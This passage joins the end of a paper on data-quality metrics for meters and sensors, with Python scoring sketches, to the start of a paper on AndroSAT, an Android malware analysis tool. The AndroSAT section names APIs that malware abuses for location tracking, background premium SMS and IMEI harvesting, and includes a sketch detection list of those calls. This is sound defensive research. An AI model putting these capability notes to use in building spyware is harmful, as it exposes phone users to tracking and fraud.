Environmental Influences | Environment/environment | The number of reported incidences that would subject the device to mechanical, acoustical and triboelectric effects
Atmospheric Influences | Environment/environment | The number of reported incidences that would subject the device to magnetic, capacitive and radio-frequency effects
Response Time | Signals/reliability | The time between the change of the state and the time taken to record the change

TABLE II. SAMPLES OF SPECIFIC DQ METRICS (EXAMPLES OF ELECTRIC POWER AND WATER METERS)

Device Name | Application-specific Quality Indicator | Description
Electric/Power Meters | Foucault Disk | Check to verify the material of the Foucault disk
Electric/Power Meters | Friction Compensation | Difference between the initial friction measured at the time the compensation was applied and the current friction in the device
Electric/Power Meters | Exposure to Vibrations | The number of reported incidences that would have subjected the device to external vibrations
Water Meters | Mounting Position | The number of days since a regulatory check was performed to observe the mounting position of the device
Water Meters | Environmental Factors | The number of reported incidences that may have affected the mounting position of the device
Water Meters | Particle Collection | The measure of the amount of particle deposition
IV. DQ METRICS CALCULUS
In the DQ calculus implementation, we plan to investigate a wide range of options for calculating integral indicators from separate metrics, ranging from simple weighted sums to sophisticated logical functions and systems. These metrics and their calculation procedures compose the DQ calculus. To simplify the calculus, we organize it as a hierarchical system that first calculates the group indicators and then combines them into the system total. We follow a user-centric approach by offering an application user a choice of various options and their adjustment. We plan to introduce automatic adjustment, verification and optimization of the function choice.
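The hierarchical calculus described above can be sketched as follows; the metric names, scores and weights are illustrative assumptions, not values from the paper, and a simple weighted sum stands in for whichever combination function a user selects:

```python
def weighted_score(scores, weights):
    """Normalized weighted sum of scores (each score assumed in [0, 1])."""
    total_w = sum(weights.values())
    return sum(scores[name] * w for name, w in weights.items()) / total_w

# Group indicators are computed first from their member metrics ...
accuracy = weighted_score({"uncertainty": 0.9, "resolution": 0.8},
                          {"uncertainty": 2.0, "resolution": 1.0})
security = weighted_score({"breaches": 0.6, "vulnerabilities": 0.7},
                          {"breaches": 1.0, "vulnerabilities": 1.0})

# ... and then combined into the system total.
total = weighted_score({"accuracy": accuracy, "security": security},
                       {"accuracy": 1.0, "security": 1.0})
print(round(total, 3))
```

Replacing `weighted_score` at any level with a different function (e.g., a rule-based evaluation) changes the calculus without altering the hierarchy.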
To realize a wide variety of logical functions, expert system technology is employed as the main implementation technique. The automated tool set includes hierarchical rule-based systems that derive values for separate metrics, then combine them into groups and finally produce an overall evaluation. In this way, the tool operation follows the metrics structure and composition (see Figure 2). This system needs to be complemented by tools and databases that assist in automating all stages of data collection, communication, processing and storage for all information available for data quality evaluation. The developed tools facilitate automated collection, communication and processing of the relevant data. Based on the data collected, they not only evaluate the overall data quality but also determine whether or not the data collection practice in place is acceptable and cite areas that are in need of improvement.

In our automated procedures, the DQ score is computed by applying a linear, exponential or stepwise linear reduction series to the maximum score of an attribute. In case an attribute defines a range of ideal operation, the linear series is substituted by a trapezoidal drop series and the exponential series is replaced by a bell drop series.
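These reduction series can be sketched as follows (a hypothetical illustration with assumed parameters; the paper does not give concrete formulas). Each function maps an attribute value, e.g., days since the last calibration or an operating temperature, to the fraction of the attribute's maximum score that is retained:

```python
import math

def linear_drop(x, x_max):
    """Linear reduction: full score at x = 0, zero at x >= x_max."""
    return max(0.0, 1.0 - x / x_max)

def exponential_drop(x, rate):
    """Exponential reduction of the score with growing x."""
    return math.exp(-rate * x)

def stepwise_drop(x, steps):
    """Stepwise linear reduction: steps is a sorted list of (threshold, score)."""
    for threshold, score in steps:
        if x <= threshold:
            return score
    return 0.0

def trapezoidal_drop(x, lo, hi, margin):
    """Full score inside the ideal range [lo, hi], linear drop over `margin` outside."""
    if lo <= x <= hi:
        return 1.0
    dist = (lo - x) if x < lo else (x - hi)
    return max(0.0, 1.0 - dist / margin)

def bell_drop(x, center, width):
    """Bell-shaped reduction around the center of an ideal range."""
    return math.exp(-(((x - center) / width) ** 2))

max_score = 10.0
print(max_score * linear_drop(365, 730))         # 5.0: half the score after one year
print(max_score * trapezoidal_drop(25, 0, 40, 20))  # 10.0: inside the ideal range
```

The choice among the series (and their parameters) is exactly what the tool exposes to the user for each attribute.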
When considering both accuracy and security DQ metrics, assessing whether fusion enhances DQ is not obvious, as one has to trade off accuracy, security and other goals. While adding a more secure data transmission channel improves both security and accuracy indicators, using a more accurate data stream will definitely improve data accuracy but could be detrimental to certain security indicators (see [24] for further discussion). If resources are limited, as in the case of sensor networks, one might consider improving the accuracy of the most secure data source rather than distributing security resources more or less evenly in order to achieve the same security level on all data channels. The concrete recommendations will depend on the application.
V. GENERIC TOOL DESIGN

Figure 2. Data quality evaluation procedure

Figure 3. Generic attribute configuration
The proposed design of the tool divides the procedure for automated data collection into three main stages. The first stage mainly involves device configuration. Since the tool is generic, it provides the flexibility to configure a large variety of diverse devices, such as electric meters, power meters, water meters and marine sensors. The second stage computes the data quality indicators of the configured device. The final stage performs a detailed analysis of the computed data quality indicators: it highlights low data quality, helps flag erroneous data, provides recommendations for improving low data quality, and helps ensure that the data being utilized are fit for their intended purpose. Figure 2 presents the architecture of the tool. Currently, the first and the second stages are implemented.
Figure 4. Application-specific attribute configuration
The generic tool allows for the configuration of a large variety of devices. Each automated data collection device has DQ factors that are common to other similar devices. These factors are referred to by the tool as generic attributes. Other attributes, which are unique to a particular device, are called dynamic attributes. These attributes are assigned a maximum score based on the significance of their contribution to the data quality: the greater the significance, the greater the score.

The configuration step mainly involves recognizing the generic and application-specific attributes, as well as assigning the maximum possible score to each of them. Generic attributes are common to most devices, for example, the timeliness and quality of common device servicing such as calibration. Application-specific attributes are unique to a device, for example, exposure to vibration, shock and radiation. This is important for a particular application because certain devices, like electric meters, produce misleading results when exposed to external adverse effects. If, for some reason, a generic attribute does not apply to a particular device, a maximum score of zero is applied in order to eliminate the attribute from the analysis. Table I describes the generic attributes considered by the tool. Figure 3 illustrates configuring some of the generic attributes for an electric meter. Table II describes some application-specific attributes, which are device and application specific. Figure 4 illustrates configuring an application-specific attribute for an electric meter, provided as an example.
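The configuration step can be pictured as a simple attribute table; the attribute names and maximum scores below are hypothetical examples, not values from the tool, and a zero maximum score removes an attribute from the analysis as described above:

```python
# Generic attributes common to most devices, with their maximum scores.
generic_attributes = {
    "time_since_calibration": 10,
    "physical_tampering_incidences": 8,
    "temperature_range": 5,
    "atmospheric_influences": 0,  # 0 = not applicable; excluded from the analysis
}

# Application-specific attributes for a particular device (here: an electric meter).
specific_attributes = {
    "exposure_to_vibrations": 6,
    "friction_compensation": 4,
}

def active_attributes(*attribute_sets):
    """Merge the configured sets, dropping attributes with a zero maximum score."""
    merged = {}
    for attrs in attribute_sets:
        merged.update({k: v for k, v in attrs.items() if v > 0})
    return merged

config = active_attributes(generic_attributes, specific_attributes)
print(sorted(config))  # atmospheric_influences is excluded
```

The merged configuration is what the second stage consumes when computing the individual quality scores.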
The second stage involves the data quality computation. The configured generic and application-specific attributes are used to compute the individual quality scores. Each attribute is considered a quality indicator, whose significance depends on its maximum score. These quality indicators produce a quality score using a chosen logic procedure. For example, consider a generic attribute called time-since-calibration. Some devices need to be calibrated every year. If a device has not been calibrated for an entire year, or for a couple of years, the quality factor for that indicator goes down; if the device has never been calibrated since its installation, the quality score is affected even more. The tool allows a user to define the procedure for calculating the application-specific quality indicators.
VI. CONCLUSIONS
The paper introduces a novel approach to data management in data collection and processing systems, which might incorporate SCADA, sensor networks and other systems with nanoscale devices. We associate each data entity with a corresponding DQ indicator. This indicator integrates various data characteristics, ranging from accuracy to security, privacy, safety, etc. It considers various samples of DQ metrics representing communication and computing security as well as data accuracy and other characteristics. Incorporating security and privacy measures into the DQ calculus is especially important in the current development, as it allows shifting the DQ assessment from the point of data origin to the point of data use.
A unified framework for assessing DQ is critical for enhancing data usage in a wide spectrum of applications because it creates new opportunities for optimizing data structures, data processing and fusion based on the use of the new DQ information. By providing an end user or an application with DQ indicators that characterize system and network security, data trustworthiness, confidence, etc., we put the end user in a much better position to decide whether and how to use the data in various applications. A user gets the opportunity to understand and compare various data files, streams and sources based on the associated DQ, with integral quality characteristics reflecting various aspects of system functionality, and to redesign data flow schemes. This development will transform one-dimensional data processing into multi-dimensional data optimization procedures for application-specific uses. We describe and demonstrate an application of the DQ metrics definition and calculation tools, which enable the integration of various metrics into an integral indicator.
REFERENCES
[1] P. W. Coteus, J. U. Knickerbocker, C. H. Lam and Y. A.
Vlasov, “Technologies for exascale systems,” IBM Journal of
Research and Developments, vol. 55, issue 5, pp. 14.1-14.12,
2011.
[2] Handbook on Nano and Molecular Electronics, Ed. S. E.
Lyshevski, CRC Press, Boca Raton, FL, 2007.
[3] B. G. Lee et al., "Monolithic silicon integration of scaled
photonic switch fabrics, CMOS logic, and device driver
circuits,” Journal of Lightwave Technology, vol. 32, issue 4,
pp. 743-751, 2014.
[4] S. E. Lyshevski, Molecular Electronics, Circuits and
Processing Platforms, CRC Press, Boca Raton, FL, 2007.
[5] Micro-Electromechanical Systems (MEMS), International
Technology Roadmap for Semiconductors, 2011 and 2013
Editions, available at www.itrs.net , accessed on August 1,
2014.
[6] A. Yariv, Quantum Electronics, John Wiley and Sons, New
York, 1988.
[7] Emerging Research Devices, International Technology
Roadmap for Semiconductors, 2011 and 2013 Editions,
available at www.itrs.net , accessed on August 1, 2014.
[8] J. Warnock, “Circuit and PD challenges at the 14nm
technology node,” Proc. 2013 ACM Int. Symposium on
Physical Design, pp. 66-67, 2013.
[9] M. Klein and W. Lehner, "Representing Data Quality in
Sensor Data Streaming Environments," J. Data and
Information Quality, vol. 1, pp. 1-28, 2009.
[10] S. Guha, A. Meyerson, N. Mishra, R. Motwani, and L.
O'Callaghan, "Clustering Data Streams: Theory and Practice,"
IEEE Trans. on Knowl. and Data Eng., vol. 15, pp. 515-528,
2003.
[11] H. S. Lim, K. M. Ghinita, and E. Bertino "A Game-Theoretic
Approach for High-Assurance of Data Trustworthiness in
Sensor Networks," presented at the IEEE 28th International
Conference on Data Engineering (ICDE 2012), Washington,
DC, USA, 2012.
[12] C. Dai, H.S. Lim, and E. Bertino "Provenance-based
Trustworthiness Assessment in Sensor Networks," , 7th
Workshop on Data Management for Sensor Networks
(DMSN), in conjunction with VLDB, DMSN 2010,
Singapore, 2010.
[13] S. Chobsri, W. Sumalai, and W. Usaha, "Quality assurance
for data acquisition in error prone WSNs," in Ubiquitous and
Future Networks, 2009. ICUFN 2009. First International
Conference on, 2009, pp. 28-33.
[14] W. Dong, H. Ahmadi, T. Abdelzaher, H. Chenji, R. Stoleru,
and C. C. Aggarwal, "Optimizing quality-of-information in
cost-sensitive sensor data fusion," in 2011 International
Conference on Distributed Computing in Sensor Systems
(DCOSS 2011), 27-29 June 2011, Piscataway, NJ, USA,
2011, 8 pp.
[15] W. Yinfeng, W. Cho-Li, C. Jian-Nong, and A. Chan, "Optimizing Data Acquisition by Sensor-channel Co-allocation in Wireless Sensor Networks," in 2010 International Conference on High Performance Computing (HiPC 2010), 19-22 Dec. 2010, Piscataway, NJ, USA, 2010, 10 pp.
[16] L. Reznik, "Integral Instrumentation Data Quality Evaluation: the Way to Enhance Safety, Security, and Environment Impact," 2012 IEEE International Instrumentation and Measurement Technology Conference, Graz, Austria, May 13-16, 2012.
[17] S. E. Lyshevski and L. Reznik, "Processing of extremely-large-data and high-performance computing," in International Conference on High Performance Computing, Kyiv, Ukraine, 2012, pp. 41-44.
[18] G. P. Timms, P. A. J. de Souza, L. Reznik, and D. V. Smith,
"Automated Data Quality Assessment of Marine Sensors,"
Sensors, vol. 11, pp. 9589-9602, 2011.
[19] G. P. Timms, P. A. de Souza, and L. Reznik, "Automated
assessment of data quality in marine sensor networks," in
OCEANS 2010 IEEE - Sydney, 2010, pp. 1-5.
[20] F. G. Alizamini, M. M. Pedram, M. Alishahi, and K. Badie,
"Data quality improvement using fuzzy association rules," in
Electronics and Information Engineering (ICEIE), 2010
International Conference On, 2010, pp. V1-468-V1-472.
[21] L. Sebastian-Coleman, Measuring Data Quality for Ongoing
Improvement: A Data Quality Assessment Framework:
Morgan-Kaufmann Publishers, 2013.
[22] ANSI/NCSL, "US Guide to the Expression of Uncertainty in
Measurement," ed, Z540-2-1997.
[23] National Institute of Standards and Technology, "Performance Measurement Guide for Information Security," Gaithersburg, MD, July 2008.
[24] L. Reznik and E. Bertino, "Poster: Data quality evaluation: integrating security and accuracy," in Proceedings of the 2013 ACM SIGSAC Conference on Computer & Communications Security, Berlin, Germany, 2013.
AndroSAT: Security Analysis Tool for Android Applications
Saurabh Oberoi∗ , Weilong Song† , Amr M. Youssef‡
Concordia Institute for Information Systems Engineering
Concordia University
Montreal, Quebec
Abstract—With about 1.5 million Android device activations per day and billions of application installations from Google Play,
Android is becoming one of the most widely used operating
systems for smartphones and tablets. In this paper, we present
AndroSAT, a Security Analysis Tool for Android applications.
The developed framework allows us to efficiently experiment
with different security aspects of Android Apps through the
integration of (i) a static analysis module that scans Android Apps
for malicious patterns. The static analysis process involves several
steps such as n-gram analysis of dex files, de-compilation of the
App, pattern search, and analysis of the AndroidManifest file;
(ii) a dynamic analysis sandbox that executes Android Apps in a
controlled virtual environment, which logs low-level interactions
with the operating system. The effectiveness of the developed
framework is confirmed by testing it on popular Apps collected
from F-Droid, and malware samples obtained from a third
party and the Android Malware Genome Project dataset. As
a case study, we show how the analysis reports obtained from
AndroSAT can be used for studying the frequency of use of
different Android permissions and dynamic operations, detection
of Android malware, and for generating cyber intelligence about
domain names involved in mobile malware activities.
Keywords–Android Security; Static Analysis; Dynamic Analysis.
I. INTRODUCTION
According to a recent report from Juniper Networks [1], smartphone sales have increased by 50% year-on-year. In the third quarter of 2013, more than 250 million smartphones were sold worldwide. This rapid increase in smartphone usage has moved the focus of many attackers and malware writers from desktop computers to smartphones. Today, mobile malware is far more widespread, and far more dangerous, especially in Bring Your Own Device (BYOD) arrangements, where mobile devices, which are often owned by users who act as de facto administrators, are used for critical business and are also integrated into enterprise, government and military networks [2][3].
Android, being one of the utmost market share holders,
not only for smartphones and tablets, but also in other fields
such as automotive integration, wearables, smart TVs and
video gaming systems, is likely to be facing the highest threat
from malware writers. As an open-source platform, Android is
arguably more vulnerable to malicious attacks than many other
platforms. According to the report from Juniper Networks [1],
mobile malware grew 614% for a total of 276,250 malicious
Apps from March 2012 to March 2013. Another recent report
from Kaspersky [4] shows that 99% of all mobile-malware in
the wild is attacking the Android platform. Kaspersky also
mentioned that mobile malware is no longer an act of an
individual hacker; some rogue companies are investing time
and money to perform malicious acts such as stealing credit
card details and launching phishing attacks, to gain profit.
According to the Kaspersky report, the number of unique
banking trojans rose from 67 to 1321 between the start and the end
of 2013, and thousands of users were tricked into paying millions
of dollars through the gradual dissemination of infected Apps.
In extreme cases, an application with malicious intent can do
more than just send premium text messages; it can turn
a phone into a spying tool. These spying tools can track the
current location of a smartphone, make phone calls, send and
receive text messages and send stolen private information to
remote servers without raising any alarm.
In this paper, we present a Security Analysis Tool for
Android applications, named AndroSAT. The developed framework allows us to experiment with different security aspects
of Android Apps. In particular, AndroSAT comprises:
• A static analysis module that scans Android Apps for malicious patterns (e.g., potentially malicious API calls and URLs). This process involves several steps such as n-gram analysis of dex files, de-compilation of the App, pattern search, and extracting security-relevant information from the AndroidManifest files.
• A dynamic analysis sandbox that executes Android Apps in a controlled virtual environment and logs low-level interactions with the operating system.
• Analysis tools and add-ons for investigating the output of the static and dynamic analysis modules.
In order to demonstrate the effectiveness of our framework,
we tested it on popular Apps collected from F-Droid [5],
which is a Free and Open Source Software (FOSS) repository
for Android applications, and a malware dataset obtained
from a third party as well as from the Android Malware
Genome Project. The reports produced by our analysis were
used to perform three case studies that aim to investigate the
frequency of use of different Android permissions and dynamic
operations, to detect malicious Apps, and to generate cyber
intelligence about domain names involved in mobile malware
activities. The results obtained in the first case study can be
utilized to narrow down the list of features that can be used to
determine malicious patterns. In the classification experiment,
using the features extracted from our analysis reports, we applied feature space reduction, and then performed classification
on the resultant dataset. As will be explained in Section V, the
obtained classification results are very promising. Finally, in
our cyber-intelligence gathering experiment, we used the IP
addresses recorded during the static and dynamic analysis of
malware Apps to produce a graphical representation of the
geographical locations of possible malicious servers (and their
ISPs) that communicate with malicious Apps. These three
experiments show the versatility as well as the wide variety
of possible usages for the information obtained by AndroSAT.
The rest of the paper is organized as follows. In the next
section, we discuss some related work. A brief review of
Android and its security model is provided in Section III.
Section IV details the design of our framework and explains
the static and dynamic analysis modules. Our experimental
results are presented in Section V. Finally, our conclusion is
given in Section VI.
II. RELATED WORK
Due to the sudden increase in the number of Android malware samples,
researchers have also moved their focus and resources towards
securing the Android platform from this rising threat. Blasing
et al. [6] developed a system named AASandbox that utilizes a
loadable kernel module to monitor system and library calls for
the purpose of analyzing Android applications. Wu et al. [7]
developed a system named DroidMat that extracts information from the AndroidManifest and, based on the collected information, drills down to trace the application programming
interface (API) calls related to the used permissions. It then
uses different clustering techniques to identify the intentions
of the Android malware. Reina et al. [8] developed a system
named CopperDroid, which performs the dynamic analysis of
an Android application based upon the invoked system calls.
They claimed that their system can detect the behavior of an
application regardless of whether it was initiated through Java, the Java Native
Interface or native code execution. Burguera et al. [9] focused
on identifying system calls made by Android applications and
developed a tool named Crowdroid to extract the system calls
and then categorize these system calls into either malicious or
benign by using K-means clustering. DroidRanger, a system
proposed in [10], consists of a permission-based behavioral
footprinting scheme that detects new samples of known Android malware families and a heuristics-based filtering scheme
that identifies certain inherent behaviors of unknown malicious
families.
Spreitzenbarth et al. [11] developed a system named
Mobile-Sandbox, which is designed to perform integrated
analysis and uses specific techniques to log calls to non-Java
APIs. Alazab et al. [12] used DroidBox, a dynamic analysis
tool that generates logs, behavior graph and treemap graphs
to explain the behavior of an Android App. They collected
33 malicious applications grouped into different families and
scanned them with different antivirus engines. They combined the
graphs of the applications within the same family to verify
whether the graphs reflect the family and then compared
them with results from different antivirus companies. Another
dynamic analysis tool named TaintDroid is presented in [13],
which is capable of simultaneously tracking multiple sources
of sensitive data accessed by an Android application. In the work
reported in [14][15], n-gram features are extracted from benign
and malware executables in Windows PE format. The extracted
features are then used to generate models with classifiers
supported by WEKA.
Compared to other related work, one key feature of our system, AndroSAT, is that the developed sandbox allows not only
observing and recording relevant activities performed
by the Apps (e.g., data sent or received over the network, data
read from or written to files, and sent text messages) but also
manipulating and instrumenting the Android emulator.
These modifications were made to the Android emulator in
order to evade simple detection techniques used by malware
writers.
III. ANDROID OVERVIEW
Android is an emerging platform with about 19 different
versions released to date [16]. Table I shows the different Android versions
with their corresponding release date. As shown in Figure 1,
the Android framework is built over Linux kernel [17] that
controls and governs all the hardware drivers such as audio,
camera and display drivers. It contains open-source libraries
such as SQLite, which is used for database purposes, and
SSL library that is essential to use the Secure Sockets Layer
protocol. The Android architecture contains Dalvik Virtual
Machine (DVM), which works similar to the Java Virtual
Machine (JVM). However, DVM executes .dex files whereas
JVM executes .class files.
TABLE I. ANDROID VERSION HISTORY

Android Version   OS Name              Release Date
1.0               Alpha                09/2008
1.1               Beta                 02/2009
1.5               Cupcake              04/2009
1.6               Donut                09/2009
2.0-2.1           Eclair               10/2009
2.2               Froyo                05/2010
2.3.x             Gingerbread          12/2010
3.1-3.2           Honeycomb            02/2011
4.0.3-4.0.4       Ice Cream Sandwich   10/2011
4.1.x-4.3         Jelly Bean           08/2012
4.4               KitKat               09/2013
Figure 1. Android architecture [17]
Every application runs in its own Dalvik virtual environment,
or sandbox, in order to avoid possible interference between
applications, and every virtual environment running an application is assigned a unique User-ID (UID). The application layer
consists of the software applications with which users interact.
This layer communicates with the application framework to
perform different activities. This application framework consists of different managers, which are used by an Android
application. For example, if an application needs access to an incoming/outgoing phone call, it needs to access the TelephonyManager. Similarly, if an application needs to pop up notifications, it should interact with the NotificationManager.

Figure 2. Overview of AndroSAT
An Android application, also known as an APK package, consists of the AndroidManifest.xml, res, META-INF, assets
and classes.dex files. The AndroidManifest.xml file contains
information about supported versions, required-permissions,
services-used, receivers-used, and features-used [17]. META-INF contains the certificate of the application developer,
while the resource directory (res) contains the graphics used by an
application, such as the background, icon and layout [17]. The assets
directory contains the files used by an Android application,
such as SQLite databases and images. The classes.dex file is
an executable file in a format that is optimized for resource-constrained systems.
IV. SYSTEM OVERVIEW
In this section, we provide an overview of AndroSAT. A
local web server is set up where we can upload Android
applications into our Droid-Repository (a MySQL database of
Android applications to be analyzed) through a PHP webpage
(DroidShelf). As depicted in Figure 2, AndroSAT includes two
main modules, namely a static analysis module and a dynamic
analysis module, which are used together to produce analysis
reports in both XML and PDF formats. The produced XML
reports can then be processed using several add-ons and analysis
tools.
A. Static Analysis
Static analysis techniques aim to analyze Android Apps
without executing them. The objective of these techniques is to
understand an application and predict what kinds of operations
and functionalities it might perform. Different forms of static
analysis have proved to be very useful in detecting malicious Apps.

Figure 3. Overview of the static analysis module

As shown in Figure 2 and
Figure 3, the process of static analysis involves several steps
such as extracting n-gram statistics of .dex files, disassembling
the application, performing pattern search for malicious API
calls and URLs, and extracting relevant information (such
as used permissions, activities, intents and actions, services,
and receivers) from the AndroidManifest file. In order to
perform the static analysis process, the analyzed application
is first fetched from the Droid-Repository. Then, data from
the AndroidManifest file is extracted from the APK package using
the Android Asset Packaging Tool (AAPT). AAPT is used for
compiling the resource files during the process of Android App
development, and is included in the Android SDK package
[18]. After the n-gram statistics are computed from the .dex file,
the application is fed to the disassembler, which disassembles
the application APK package to obtain the SMALI and Java
code of the application. The disassembly process is performed
using APKTool [19] and Apk2java [20], which are open source
reverse engineering tools. Once the source code is obtained
from the Android application undergoing analysis, we search
for malicious functions/API calls, URLs and IP addresses. In
what follows, we provide further details on the n-gram
analysis process and the different features extracted from both
the AndroidManifest file and the source code.
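The AAPT-based extraction step can be sketched as follows. This is a minimal illustration, not AndroSAT's actual code: it assumes the `aapt` tool from the Android SDK build tools is on the PATH, and the parser only picks permission names out of `aapt dump permissions` output.

```python
import re
import subprocess

def parse_aapt_permissions(aapt_output: str) -> list:
    """Extract permission names from `aapt dump permissions <apk>` output.

    aapt prints lines such as:
        uses-permission: android.permission.INTERNET
        uses-permission: name='android.permission.SEND_SMS'   (newer aapt)
    """
    perms = []
    for line in aapt_output.splitlines():
        m = re.match(r"uses-permission: (?:name=')?([\w.]+)'?", line.strip())
        if m:
            perms.append(m.group(1))
    return perms

def dump_permissions(apk_path: str) -> list:
    """Run aapt on an APK (requires the Android SDK build tools)."""
    out = subprocess.run(["aapt", "dump", "permissions", apk_path],
                         capture_output=True, text=True, check=True).stdout
    return parse_aapt_permissions(out)
```

The same pattern extends to `aapt dump badging`, which reports the package name, versions and declared features.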
1) N-gram Analysis: Different forms of n-gram analysis
have been previously used for malware detection in the Windows and Linux/Unix environments. Unlike Portable
Executables (PE), but similar to MSI packages in Windows,
Android uses the Android application package (APK)
file format to install application software. The
APK file can be looked at as a zip compression package
containing all of the application bytecode including classes.dex
file, compiled code libraries, application resource (such as
images, and configuration files), and an XML file, called
AndroidManifest. The classes.dex file holds all of the application
bytecode, so any modification in the application
behavior will lead to a change in this file. The process of n-gram analysis is performed by extracting the application bytecode
file (i.e., classes.dex), calculating byte n-grams, and then
performing a dimensionality reduction step on these calculated
n-gram features. The byte n-grams are generated from the
overlapping substrings collected using a sliding window of fixed
size that slides one byte at a time. The n-gram feature extraction captures the frequency of substrings
of length n bytes. Since the total number of extracted features
is very large, we apply feature reduction to select appropriate
features for malware detection. We chose Classwise Document
Frequency (CDF) [14] as our feature selection criterion. AndroSAT
applies feature reduction on bigrams and trigrams sorted by
CDF value, and the top k features are selected. The obtained
feature vectors are saved in the analysis reports and can then be
used as inputs for classifiers to generate models for malicious
Apps. Surprisingly, as will be shown in the experimental
results in Section V, applying this simple analysis method to
.dex files, even without any pre-processing or normalization of
the bytecode, yields very promising results and allows us to
differentiate between malicious and benign applications with
very good accuracy.
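The sliding-window extraction and top-k selection described above can be sketched as follows. This is a minimal sketch, not AndroSAT's implementation: the scoring function uses a plain difference of per-class document frequencies as a simplified stand-in for the classwise document frequency criterion of [14].

```python
from collections import Counter

def byte_ngrams(data: bytes, n: int) -> Counter:
    """Slide a window of n bytes over the file, one byte at a time,
    counting every overlapping substring."""
    return Counter(data[i:i + n] for i in range(len(data) - n + 1))

def classwise_doc_frequency(class_a_docs, class_b_docs, n=2):
    """Score each n-gram by the absolute difference of its document
    frequencies in the two classes (simplified stand-in for CDF)."""
    def doc_freq(docs):
        c = Counter()
        for d in docs:
            c.update(set(byte_ngrams(d, n)))  # count each document once
        return c
    fa, fb = doc_freq(class_a_docs), doc_freq(class_b_docs)
    grams = set(fa) | set(fb)
    return {g: abs(fa[g] / max(len(class_a_docs), 1)
                   - fb[g] / max(len(class_b_docs), 1)) for g in grams}

def top_k_features(scores, k):
    """Keep the k n-grams with the highest scores as the feature set."""
    return [g for g, _ in sorted(scores.items(), key=lambda kv: -kv[1])[:k]]
```

In practice, the inputs would be the raw bytes of each classes.dex file, and the selected n-grams become the feature vector fed to the classifiers of Section V.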
2) Features extracted from the AndroidManifest file:
Throughout the analysis process, the following features are
extracted from the AndroidManifest file of analyzed applications:
• Requested Permissions: An Android application does
not need any permission unless it is trying to use
a private or system related resource/functionality of
the underlying Android device. There are numerous permissions that developers can add into an
Android application to provide better experience to
users. Examples of these permissions include CAMERA, VIBRATE, WRITE_EXTERNAL_STORAGE,
RECEIVE_SMS, and SEND_SMS [5]. The permissions
requested by an application inform users about what
they can expect from it, and a smart
user can easily realize if an application is asking for
more than it supposedly needs. For example, an
application claiming to show weather reports should
raise suspicion if it requests the SEND_SMS permission.
• Features Used: An Android application can use hardware or software features. The available features (e.g.,
bluetooth, and camera) vary across Android
devices. Therefore, many applications declare a feature as
a preference, i.e., they can still function even if the
feature is not available. Features come with a required
attribute that lets a developer specify whether the
application can work normally without the specific feature.
• Services-Used: Services-Used lists all the services
recorded in the application's AndroidManifest file. In an
Android application, a service can be used to perform
operations that need to run in the background for a
long time without any user interaction. The service
keeps running even if the user switches to another
application. An attacker can make use of a service to
perform malevolent activities without raising an alarm.
• Receivers Used: In Android, a broadcast is sent out to notify applications that an event has occurred.
A broadcast is triggered once the event registered
with the corresponding broadcast receiver [21] occurs.
The main purpose of using a broadcast receiver is
to receive a notification once an event occurs. For
example, if there is a new incoming message, a
broadcast about the new incoming message is sent out,
and applications that use the corresponding receiver,
i.e., the SMS_RECEIVED receiver, will get the incoming
message. Malicious applications can use broadcast
receivers in numerous ways, such as receiving incoming messages and monitoring the phone state.
• Intents and Actions: An intent or action specifies
the exact action performed by the broadcast receiver
used in an application. Some of the most widely
used broadcast actions include SMS_RECEIVED
and BOOT_COMPLETED.
• Activities Used: Activities-used is a list of all the
activities used in an Android application. In Android,
every screen that is a part of an application and with
which users can interact is known as an activity. An
application can have more than one activity.
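Once the binary AndroidManifest.xml has been decoded to plain XML (e.g., by APKTool), the features listed above can be collected with a short parser. A minimal sketch using only the standard library:

```python
import xml.etree.ElementTree as ET

# Android attributes live in this XML namespace.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

def manifest_features(xml_text: str) -> dict:
    """Collect permissions, features, services, receivers and activities
    from a decoded AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    name = lambda e: e.get(ANDROID_NS + "name")
    return {
        "permissions": [name(e) for e in root.iter("uses-permission")],
        "features":    [name(e) for e in root.iter("uses-feature")],
        "services":    [name(e) for e in root.iter("service")],
        "receivers":   [name(e) for e in root.iter("receiver")],
        "activities":  [name(e) for e in root.iter("activity")],
    }
```

Intents and actions can be collected the same way by iterating over the `intent-filter` and `action` elements nested under each receiver.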
3) Feature Extraction from Source Code: In this section,
we list the features extracted from the decompiled SMALI and
Java source code.
• getLastKnownLocation: This function is used to get
the last known location from a particular location
provider. Getting this information does not require
starting the location provider, which makes it more
dangerous and harder to notice. Even if this information is
stale, it can still be useful to malicious
App developers in some contexts.
• sendTextMessage: This function is most widely used
by many malware developers to earn money or to
send bulk messages while hiding their identity. The
biggest advantage that attackers have when utilizing
this function is that it sends text messages in the
background and does not require any user intervention.
• getDeviceId: This function is used to obtain the International Mobile Station Equipment Identity (IMEI)
number of the Android device. Every device has its
own unique IMEI that can be used by the service
provider to allow the device to access the network
or block its access to the network. IMEIs of stolen
phones are blacklisted so that they never get access to
the network. An attacker with malevolent intentions
can use this unique code to clone a device and then
perform illegal activities, or blacklist the IMEI so
that the user can never put the device back onto the cellular
network.
All the features extracted by the static analysis module are then
fed to a parser module in order to remove redundant data. The
extracted relevant information is then saved in both XML and
PDF formats.
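The pattern-search step over the decompiled sources can be sketched as follows. This is a minimal illustration under stated assumptions: the call list and regular expressions below are hypothetical examples, and AndroSAT's actual signature set is larger.

```python
import re

# Hypothetical pattern lists for illustration only.
SUSPICIOUS_CALLS = ["getLastKnownLocation", "sendTextMessage", "getDeviceId"]
URL_RE = re.compile(r"https?://[^\s\"';]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def scan_source(code: str) -> dict:
    """Search decompiled SMALI/Java text for suspicious API calls,
    URLs and IP addresses."""
    return {
        "calls": sorted({c for c in SUSPICIOUS_CALLS if c in code}),
        "urls": URL_RE.findall(code),
        "ips": IP_RE.findall(code),
    }
```

In a full implementation, this scan would run over every decompiled file of the App, and the hits would be merged into the XML report alongside the manifest and n-gram features.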
B. Dynamic Analysis
The main advantage of the static analysis described above
is that it can be performed very efficiently, without
the need to execute the Apps, hence avoiding any risk associated with executing malicious Apps. On the other hand, some
malware writers use different obfuscation and cryptographic
techniques that make it almost impossible for static analysis
techniques to obtain useful information, which makes it essential to use dynamic analysis. Dynamic analysis is most widely
used to analyze the behavior and interactions of an application
with the operating system. Typically, dynamic analysis is
performed using a virtual machine controlled environment in
order to avoid any possible harm that can result from running
the malware on actual mobile devices. Furthermore, using the
virtual environment makes it easier to prepare a fresh image
and install the new application in question on it for analysis.
The main disadvantage of dynamic analysis, however, is
that its usefulness is correlated with the length of the analysis
interval: some malicious activities may not be invoked by the
App during the usually short analysis interval, either because
